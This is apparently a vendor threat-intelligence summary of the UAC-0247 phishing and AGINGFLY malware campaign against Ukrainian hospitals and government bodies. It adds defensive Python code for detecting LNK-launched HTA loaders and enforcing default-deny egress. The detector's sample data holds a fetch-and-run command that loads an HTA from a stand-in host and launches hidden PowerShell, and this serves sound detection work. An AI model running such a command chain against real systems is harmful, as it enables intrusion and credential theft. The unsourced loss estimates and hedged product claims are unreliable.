Executive Summary
Between March and April 2026, the Ukrainian Computer Emergency Response Team (CERT-UA) identified a surge in cyberattacks targeting healthcare institutions, emergency services, and local government bodies. The threat actor, designated as UAC-0247, employed phishing emails disguised as humanitarian aid offers to deliver malicious LNK files. These files exploited Windows utilities to execute remote code, leading to the deployment of multi-stage loaders and custom malware, notably the AGINGFLY backdoor. AGINGFLY facilitated persistent remote control, enabling attackers to steal credentials from Chromium-based browsers and WhatsApp, and to deploy additional tools like SILENTLOOP and RAVENSHELL for further exploitation. (bleepingcomputer.com)
This campaign underscores a concerning evolution in cyber threats, with attackers leveraging sophisticated social engineering tactics and dynamic malware to infiltrate critical infrastructure. The focus on healthcare and government sectors highlights the urgent need for enhanced cybersecurity measures to protect sensitive data and maintain operational integrity in essential services.
Why This Matters Now
The UAC-0247 campaign exemplifies the increasing sophistication of cyberattacks targeting critical infrastructure, particularly in sectors vital to public welfare. The use of advanced malware like AGINGFLY, which dynamically compiles command handlers at runtime, poses significant challenges to traditional detection methods. Organizations must prioritize the implementation of robust cybersecurity protocols, including employee training on phishing awareness, to mitigate the risks associated with such evolving threats.
Attack Path Analysis
The attack began with phishing emails disguised as humanitarian aid offers, leading victims to malicious websites that delivered LNK files. These files executed HTA scripts to download and run malware, including AGINGFLY, which established command and control channels. The malware facilitated credential theft from browsers and WhatsApp, enabling lateral movement within networks. Stolen data was exfiltrated to attacker-controlled servers, potentially leading to further exploitation or ransom demands.
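The chain described above (shortcut opened by the user, script host fetching an HTA from a remote server, HTA handing off to PowerShell) leaves a recognisable process-tree pattern. The following detector is an added example written for this summary; it is not code from CERT-UA or from any of the cited sources, and the Sysmon-style records it runs over are constructed sample data, not telemetry from the UAC-0247 campaign.

```python
"""Flag process-creation events consistent with an LNK-launched HTA loader.

Added example for this summary, not code from CERT-UA or from the page's
sources. The Sysmon-style records below are constructed sample data, not
telemetry from the UAC-0247 campaign.
"""
import re

# Constructed sample events (Sysmon Event ID 1 style, heavily simplified).
SAMPLE_EVENTS = [
    {"pid": 412, "ppid": 100, "image": r"C:\Windows\explorer.exe",
     "cmd": "explorer.exe"},
    # User double-clicks a shortcut: explorer.exe runs the LNK target directly.
    {"pid": 500, "ppid": 412, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": 'cmd.exe /c start "" mshta.exe http://aid-offer.example/offer.hta'},
    {"pid": 501, "ppid": 500, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta.exe http://aid-offer.example/offer.hta"},
    {"pid": 600, "ppid": 501,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -NoProfile -w hidden -Command <redacted>"},
    # Benign activity from the same session, for contrast.
    {"pid": 700, "ppid": 412, "image": r"C:\Program Files\Microsoft Office\winword.exe",
     "cmd": r'"winword.exe" C:\Users\alice\Documents\report.docx'},
    {"pid": 800, "ppid": 412, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r"mshta.exe C:\Program Files\Vendor\setup.hta"},
]

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestors(event, by_pid, max_depth=4):
    """Walk up the process tree, bounded so malformed data cannot loop forever."""
    current = by_pid.get(event["ppid"])
    depth = 0
    while current is not None and depth < max_depth:
        yield current
        current = by_pid.get(current["ppid"])
        depth += 1


def analyse(events):
    """Return findings for the two behaviours the attack chain relies on."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        parent_name = basename(parent["image"]) if parent else ""

        # 1. A script host (mshta.exe etc.) given a URL: the HTA is fetched
        #    from a remote server rather than opened from a local file.
        if name in SCRIPT_HOSTS and URL_RE.search(e["cmd"]):
            note = "script host launched with a remote URL"
            if any(basename(a["image"]) == "explorer.exe"
                   for a in ancestors(e, by_pid)):
                note += "; started from the interactive shell (consistent with an LNK double-click)"
            findings.append({"pid": e["pid"], "rule": "remote_hta",
                             "severity": "high", "note": note})

        # 2. A script host spawning a command shell: the HTA handing off to
        #    PowerShell or cmd.exe to stage the next loader.
        if name in SHELLS and parent_name in SCRIPT_HOSTS:
            findings.append({"pid": e["pid"], "rule": "script_host_spawns_shell",
                             "severity": "high",
                             "note": f"{parent_name} spawned {name}"})
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS):
        print(f"[{f['severity']}] pid={f['pid']} {f['rule']}: {f['note']}")
```

On the sample data only the remote mshta.exe launch (pid 501) and the PowerShell child it spawns (pid 600) are flagged; the locally installed HTA (pid 800) is not, which is the distinction that keeps this rule quiet on hosts where vendors ship HTA-based installers. The same two rules translate directly into a SIEM query over Sysmon Event ID 1 or Windows Security event 4688 with command-line auditing enabled.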
Kill Chain Progression
Initial Compromise
Description
Attackers sent phishing emails posing as humanitarian aid offers, leading victims to malicious websites that delivered LNK files.
MITRE ATT&CK® Techniques
Spearphishing Attachment
Malicious File
Browser Information Discovery
Credentials from Web Browsers
Browser Session Hijacking
Web Protocols
Obfuscated Files or Information
PowerShell
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Malicious Software Prevention
Control ID: 6.4.3
NYDFS 23 NYCRR 500 – Training and Monitoring
Control ID: 500.14
DORA – ICT Risk Management Framework
Control ID: Article 5
CISA ZTMM 2.0 – Identity and Access Management
Control ID: 3.1
NIS2 Directive – Cybersecurity Risk Management Measures
Control ID: Article 21
HIPAA – Protection from Malicious Software
Control ID: 164.308(a)(5)(ii)(B)
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Health Care / Life Sciences
Ukrainian clinics and emergency hospitals targeted by UAC-0247 infostealer malware campaign stealing sensitive browser and WhatsApp data, requiring enhanced egress security and encrypted traffic protection.
Government Administration
Government institutions directly targeted in data-theft campaign exploiting unencrypted traffic vulnerabilities, necessitating zero trust segmentation and multicloud visibility controls for threat detection.
Computer/Network Security
Security professionals must address the lateral movement and command-and-control capabilities demonstrated in the campaign by implementing threat detection systems and egress policy enforcement mechanisms.
Information Technology/IT
IT infrastructure requires immediate deployment of east-west traffic security and anomaly detection capabilities to prevent similar infostealer attacks targeting Chromium browsers and messaging applications.
Sources
- UAC-0247 Targets Ukrainian Clinics and Government in Data-Theft Malware Campaign – https://thehackernews.com/2026/04/uac-0247-targets-ukrainian-clinics-and.html
- New AgingFly malware used in attacks on Ukraine govt, hospitals – https://www.bleepingcomputer.com/news/security/new-agingfly-malware-used-in-attacks-on-ukraine-govt-hospitals/
- Ukraine Warns of Surge in Cyberattacks on Hospitals, Local Governments by UAC-0247 Hackers – https://thecyberexpress.com/cyberattacks-on-hospitals-by-uac-0247-hackers/
- CERT-UA Impersonation Campaign Spread AGEWHEEZE Malware to 1 Million Emails – https://thehackernews.com/2026/04/cert-ua-impersonation-campaign-spread.html
Cloud Native Security Fabric Mitigations and Controls
Aviatrix Zero Trust CNSF is pertinent to this incident as it could likely limit the attacker's ability to move laterally and exfiltrate data by enforcing strict segmentation and controlled egress policies.
Control: Cloud Native Security Fabric (CNSF)
Mitigation: The CNSF may not directly prevent the initial phishing compromise but could limit the subsequent execution of malicious payloads within the cloud environment.
Control: Zero Trust Segmentation
Mitigation: Zero Trust Segmentation could likely limit the attacker's ability to escalate privileges by enforcing strict access controls between workloads.
Control: East-West Traffic Security
Mitigation: East-West Traffic Security could likely constrain the attacker's lateral movement by monitoring and controlling internal traffic flows.
Control: Multicloud Visibility & Control
Mitigation: Multicloud Visibility & Control could likely detect and limit unauthorized outbound communications to command and control servers.
Control: Egress Security & Policy Enforcement
Mitigation: Egress Security & Policy Enforcement could likely limit data exfiltration by controlling and monitoring outbound traffic.
While CNSF may not prevent the initial data exfiltration, its controls could likely limit the scope of data accessible to attackers, thereby reducing potential impact.
Impact at a Glance
Affected Business Functions
- Electronic Health Records (EHR)
- Patient Scheduling
- Billing Systems
- Emergency Response Coordination
Estimated downtime: 7 days
Estimated loss: $500,000
Patient medical records, including personally identifiable information (PII) and health histories.
Recommended Actions
Key Takeaways & Next Steps
- Implement Zero Trust Segmentation to restrict lateral movement within the network.
- Enforce Egress Security & Policy Enforcement to monitor and control outbound traffic, preventing unauthorized data exfiltration.
- Deploy Threat Detection & Anomaly Response systems to identify and respond to malicious activities promptly.
- Utilize Inline IPS (Suricata) to detect and prevent exploitation attempts and known malicious payloads.
- Enhance Multicloud Visibility & Control to monitor and manage security across all cloud environments.
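The egress and east-west controls recommended above come down to one rule: every workload zone has an explicit allow-list of destinations, and any flow outside it (to the Internet or to another internal zone) is denied and logged. The evaluator below is an added example written for this summary; it is not Aviatrix CNSF code and does not describe how that product is implemented. The zones, allow-list and flow records are constructed sample data for a hypothetical clinic network.

```python
"""Evaluate outbound flow records against a default-deny egress policy.

Added example for this summary; it is not Aviatrix CNSF code and does not
describe how that product works. The zones, allow-list and flow records are
constructed sample data for a hypothetical clinic network.
"""
import ipaddress
from collections import Counter, namedtuple

Flow = namedtuple("Flow", "src dst dport proto")

# Constructed zones: which subnet each workload group lives in.
ZONES = {
    "ehr-app": ipaddress.ip_network("10.10.1.0/24"),
    "workstations": ipaddress.ip_network("10.50.0.0/16"),
}

# RFC 1918 space, used to tell east-west traffic apart from Internet egress.
INTERNAL = [ipaddress.ip_network(n)
            for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed allow-list: (destination network, port, protocol) per zone.
# Anything not listed is denied, including traffic to other internal zones.
EGRESS_POLICY = {
    "ehr-app": [
        (ipaddress.ip_network("10.20.0.0/24"), 5432, "tcp"),   # EHR database
        (ipaddress.ip_network("10.30.0.5/32"), 443, "tcp"),    # update proxy
    ],
    "workstations": [
        (ipaddress.ip_network("10.30.0.5/32"), 443, "tcp"),    # web proxy
        (ipaddress.ip_network("10.1.0.53/32"), 53, "udp"),     # internal DNS
    ],
}


def zone_of(ip):
    """Name of the zone containing ip, or None if the source is unknown."""
    addr = ipaddress.ip_address(ip)
    for name, net in ZONES.items():
        if addr in net:
            return name
    return None


def is_internal(addr):
    return any(addr in net for net in INTERNAL)


def evaluate(flow):
    """Return (verdict, reason) for one flow under the default-deny policy."""
    zone = zone_of(flow.src)
    if zone is None:
        return "deny", "source not in any known zone"
    dst = ipaddress.ip_address(flow.dst)
    for net, port, proto in EGRESS_POLICY[zone]:
        if dst in net and flow.dport == port and flow.proto == proto:
            return "allow", f"{zone} -> {net} {proto}/{port}"
    if is_internal(dst):
        return "deny", f"{zone} east-west traffic to {flow.dst}:{flow.dport} not on allow-list"
    return "deny", f"{zone} egress to external {flow.dst}:{flow.dport} not on allow-list"


def evaluate_all(flows):
    return [(f, *evaluate(f)) for f in flows]


def noisy_sources(results, threshold=2):
    """Sources with at least `threshold` denied flows: a simple anomaly signal
    for a host that keeps trying destinations it was never allowed to reach."""
    denied = Counter(f.src for f, verdict, _ in results if verdict == "deny")
    return {src: n for src, n in denied.items() if n >= threshold}


# Constructed flow records from a hypothetical day of traffic.
SAMPLE_FLOWS = [
    Flow("10.50.3.7", "10.30.0.5", 443, "tcp"),      # workstation via proxy: allowed
    Flow("10.50.3.7", "203.0.113.7", 443, "tcp"),    # direct to Internet: denied
    Flow("10.50.3.7", "203.0.113.7", 8443, "tcp"),   # second attempt: denied
    Flow("10.10.1.4", "10.20.0.9", 5432, "tcp"),     # EHR app to its database: allowed
    Flow("10.10.1.4", "10.50.0.12", 445, "tcp"),     # EHR app to a workstation: denied
    Flow("192.168.9.9", "10.20.0.9", 5432, "tcp"),   # unknown source: denied
]

if __name__ == "__main__":
    results = evaluate_all(SAMPLE_FLOWS)
    for flow, verdict, reason in results:
        print(f"{verdict:5} {flow.src} -> {flow.dst}:{flow.dport}/{flow.proto}  {reason}")
    print("noisy sources:", noisy_sources(results))
```

The point of the default-deny shape is that a workstation talking directly to an unlisted Internet address (the pattern a command-and-control channel or exfiltration takes when it bypasses the proxy) is denied without anyone having to know the attacker's infrastructure in advance; the denied-flow counter then gives the anomaly-detection layer something to alert on.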